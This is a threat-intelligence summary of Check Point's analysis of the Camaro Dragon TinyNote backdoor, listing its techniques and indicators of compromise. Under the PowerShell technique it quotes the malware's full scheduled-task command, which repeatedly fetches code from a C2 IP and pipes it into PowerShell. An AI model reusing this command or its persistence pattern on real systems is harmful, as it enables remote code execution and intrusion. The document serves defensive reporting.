Check Point Research traces Camaro Dragon activity to a Go-based backdoor named TinyNote used against Southeast and East Asian foreign affairs targets, detailing its multi-stage persistence and C2 infrastructure. The campaign includes SmadAV evasion, ties to MQsTTang infrastructure, and a two-mode backdoor design that emphasizes redundancy and ongoing command execution capabilities. #CamaroDragon #TinyNote #MQsTTang #SmadAV
Keypoints
- A Go-based backdoor called TinyNote was found on a Camaro Dragon distribution server and communicates with other Camaro Dragon C2s.
- TinyNote uses foreign affairs-themed file names and appears aimed at Southeast and East Asian embassies.
- The backdoor bypasses the Indonesian antivirus SmadAV, exploiting a crafted window trick to appear visible while evading detection.
-
- The malware establishes persistence with multiple scheduled tasks and uses multiple C2 servers to avoid a single point of failure.
- Data is encoded/encrypted (simple XOR with NASA key and Base64) and C2 communications rely on HTTP(S) with command responses returned via headers and POSTs.
MITRE Techniques
- [T1059.001] PowerShell – The malware uses PowerShell-based command execution, including retrieving and executing commands via scheduled tasks from C2: ‘schtasks /Create /TN test /SC MINUTE /MO 15 /TR “powershell “$r=[System.Net.WebRequest]::Create(“http://5.188.33.190/Robots.txt”);(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -“” /f”‘
- [T1053.005] Scheduled Task/Job: Windows Task Scheduler – The sample creates two tasks to pull and execute PowerShell commands from robots.txt on multiple C2 servers to avoid single points of failure: ‘Next, the malware creates 2 scheduled tasks called test and test2 to retrieve and execute PowerShell commands, each retrieved from robots.txt from different C&C servers, most likely to eliminate a single point of failure’
- [T1027.001] Obfuscated/Compressed Files or Information – The enumeration data is encrypted with a simple XOR and Base64: ‘it encrypts the string using a simple XOR encryption algorithm with the key NASA and Base64 encodes it afterward.’
- [T1082] System Information Discovery – The backdoor enumerates system data (username, home folder, network interfaces) and concatenates it for exfiltration: ‘The malware enumerates the system for the following data and concatenates it to one string: The current system username; The current username home folder; The system’s network interfaces (name, MacAddress, description)’.
- [T1562.001] Impair Defenses – By bypassing SmadAV using a crafted window, the malware demonstrates defense evasion: ‘bypassSMADAV, whose purpose is to bypass the Indonesian antivirus Smadav.’
- [T1036] Masquerading – The use of a folder icon and naming conventions to mislead victims: ‘The samples also contain folder icon in an attempt to deceive victims about their real purpose.’
- [T1071.001] Web Protocols – The backdoor communicates with C2 over HTTP(S), including encoding/decoding command payloads and returning results: ‘The expected result from the server is a JSON with the following structure: {“msg”:”[BASE64-ENCODED COMMAND]”}’ and subsequent POST of results.
Indicators of Compromise
- [Hash] f0b081ca58b6c253aa0014847c62dbad – TinyNote sample hash observed on Camaro Dragon distribution server
- [Hash] 6a2204b32a60aed0a3403c63ad2a529c – Another TinyNote sample hash
- [IPv4] 5.188.33.190 – One of the C2/RS servers referenced in the payload flow
- [IPv4] 103.169.90.132 – C2 server used by threat actors
- [IPv4] 103.159.132.91 – C2/MQsTTang-associated server
- [IPv4] 23.106.123.59 – Additional server used in distribution/infrastructure
Read more: https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/